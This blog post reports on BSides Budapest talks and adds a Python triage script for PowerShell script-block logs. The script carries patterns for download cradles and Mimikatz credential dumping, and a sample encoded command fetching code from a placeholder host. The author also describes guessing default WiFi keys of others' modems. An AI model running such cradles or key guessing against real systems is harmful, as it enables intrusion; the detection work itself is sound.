Quick impressions from BSides Budapest

Posted by    on   Mar 8, 2017

At Virus Bulletin, we love the BSides concept and we have attended several of the BSides events around the world. So when Peter Karsai, who is soon to join the VB team, offered to write something about his experience at BSides Budapest, we jumped at the chance to publish his post.

 

Growing up in Eastern Europe during the final years of the Soviet bloc, my primary connection to the West was through the VCR: bootlegged Hollywood movies from Germany, copied a hundred times, with ridiculous home-brewed Hungarian voiceover, over German voiceover, over Mr. Miyagi from The Karate Kid. It was our esteemed family VCR that first introduced me to the concept of "economies of scale": when the light fell at the right angle, the built-in display revealed placeholder symbols for functions not available in our entry-level model. I was startled, so my brother took up the duty of explaining that it is often cheaper to produce zillions of the same device and let some functionality lie unused in some of them than it is to manufacture a custom device for individual models. When setup costs are high, producing many of the same brings your per-item costs down. He added that this is called "economies of scale" – because that's exactly the sort of term an eight-year-old finds indispensable in his daily adventures.

 

[Image] A vacuum fluorescent display from a typical VCR.
By Atlant assumed (based on copyright claims). [GFDL, CC-BY-SA-3.0 or CC BY 2.5], via Wikimedia Commons

 

Fast forward to 2017 and BSides Budapest, and Tobias Schrödel's presentation on smart device hacking gave a glaring example of this concept at work. He started his demonstration by showing the audience how to hack a camera-equipped RC car and enable HD camera resolution for the cheaper, SD-only variant of the toy car. Economies of scale: when setting up and changing production lines is expensive, and software configuration is cheap, it actually makes a lot of sense for the vendor to cut costs through software and not to be too concerned about plunging sales of the HD version among hacker types. However, cost efficiency and a lack of concern can be a lot more damaging when it results in a complete disregard for basic security. Much to the amusement of the audience, Tobias demonstrated this vividly by hijacking a camera-equipped adult toy (yes, it's a thing), and then just to wrap the show up he gave a handy demo of how to bring a big stage light show to your neighbour by hacking their smart lightbulbs (which is only fair payback for using the angle grinder at 7AM on a Sunday morning, I suppose).

The presentation given by Zoltán Balázs of MRG Effitas on IoT device security – and the lack thereof – only reinforced the message that vendors really need to get their act together on this front, no matter the pressure from the market to ship fast and early. Mirai, anyone?

Feeling that these two presentations had warmed me up sufficiently for more serious work, I joined the workshop on Cuckoo Sandbox custom module development. Note to self: take an intermediate subject only after your understanding of the basics is fairly solid.

[GIF via GIPHY] Artist's impression of my understanding following "Welcome to the Cuckoo workshop".

The coffee breaks between conference sessions allowed for a little chat amongst fellow attendees; I loved these as much as the presentations themselves. For instance, somebody casually showed me how one could get, er, free WiFi from certain cable modems on the UPC network. This is actually a fun one: turns out that the default WiFi password of certain Ubee modems that UPC commonly deploys for consumers can be guessed from the advertised SSID. This has been a known issue for several months now, yet I had no difficulty whatsoever in finding vulnerable WiFi networks when I tried the key generator app – so maybe this is less a 'fun one' and more a 'holy macaroni!' one.


[Screenshot: routerkeygen-yolosec.png]


Returning from lunch, I just managed to catch Jeff Hamm's presentation on the attack and forensics arsenal offered by PowerShell and his case study on how PowerShell was utilised in a successful attack against a bank, eventually gaining the attacker access to the SWIFT subsystem and the ability to transfer money out, before destroying the systems affected. You can't say that it's called PowerShell for no reason, right?
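The flip side of PowerShell's attack arsenal is its forensic record: with script block logging enabled, Windows writes the text of every executed script block to the Microsoft-Windows-PowerShell/Operational log as event 4104, and that text is where an incident responder starts. As an added example (not code from the original post, from Jeff Hamm's talk or from Virus Bulletin), the following Python script triages such script-block text for common attacker indicators and decodes -EncodedCommand payloads so that a download cradle hidden inside one still surfaces. The sample blocks, the indicator list and the weights are this example's own constructed assumptions, not anything from the talk.

```python
"""Triage of PowerShell script-block text for attacker indicators.

Added example, not code from the talk or the post. The sample script
blocks below are constructed for this example and the indicator weights
are an arbitrary prioritisation, not an established scoring scheme.
"""
import base64
import re

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Indicator name -> (pattern, weight). Weights are this example's own choice.
INDICATORS = {
    "encoded_command":   (ENCODED_RE, 3),
    "hidden_window":     (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "no_profile":        (re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    "download_cradle":   (re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I), 3),
    "invoke_expression": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 3),
    "credential_dump":   (re.compile(r"Invoke-Mimikatz|sekurlsa|lsass", re.I), 5),
    "base64_inline":     (re.compile(r"FromBase64String", re.I), 2),
}


def decode_encoded_command(text):
    """Return the decoded command behind the first -EncodedCommand argument, or None.

    PowerShell expects the argument to be base64 over UTF-16LE, so that is
    what we reverse; malformed input is reported as None rather than raised.
    """
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_block(text):
    """Score one script block: indicators found, decoded payload (if any) and total weight."""
    decoded = decode_encoded_command(text)
    # Scan both the literal block and whatever it decodes to, so a cradle
    # wrapped in -EncodedCommand is caught the same way as a plain one.
    haystack = text if decoded is None else text + "\n" + decoded
    hits = sorted(name for name, (pattern, _) in INDICATORS.items() if pattern.search(haystack))
    score = sum(INDICATORS[name][1] for name in hits)
    return {"block": text, "decoded": decoded, "indicators": hits, "score": score}


def triage(blocks, threshold=3):
    """Return analysed blocks scoring at least `threshold`, highest score first."""
    results = [analyse_block(b) for b in blocks]
    return sorted((r for r in results if r["score"] >= threshold),
                  key=lambda r: r["score"], reverse=True)


# Constructed sample: a download cradle, encoded the way an attacker would
# pass it to powershell.exe -EncodedCommand (base64 over UTF-16LE).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed script-block texts, as event 4104 would record them.
SAMPLE_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED}",
    "Invoke-Mimikatz -DumpCreds",
    "Get-Date -Format yyyy-MM-dd",
]

if __name__ == "__main__":
    for r in triage(SAMPLE_BLOCKS):
        print(f"score={r['score']:2d} indicators={r['indicators']}")
        if r["decoded"]:
            print(f"    decoded: {r['decoded']}")
```

Run against the constructed sample, the encoded cradle comes out on top (encoded command, hidden window, no profile, download cradle and IEX all fire once the payload is decoded), the Mimikatz call is second, and the two benign administrative lines score zero. In practice the same logic is run over the 4104 events exported from the affected hosts, which is only possible if script block logging was turned on before the intrusion, so enabling it (and forwarding the log off the host, since the attackers in the case study wiped the systems afterwards) is the check to make now rather than during the incident.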

I had to leave a bit prematurely, but the first BSides Budapest left me with very good impressions. Kudos to the organisers and sponsors for bringing together a wide variety of talks for security professionals and enthusiasts alike. And on my way home I might have won them another attendee for next year: the cab driver listened quite intently to my stories from the infosec world and said he would totally consider a second career in this area. If only it hadn't happened right after explaining ransomware-as-a-service – I can only hope this was responsible disclosure. See you at the next #BSidesBUD event, blackhat cab driver!
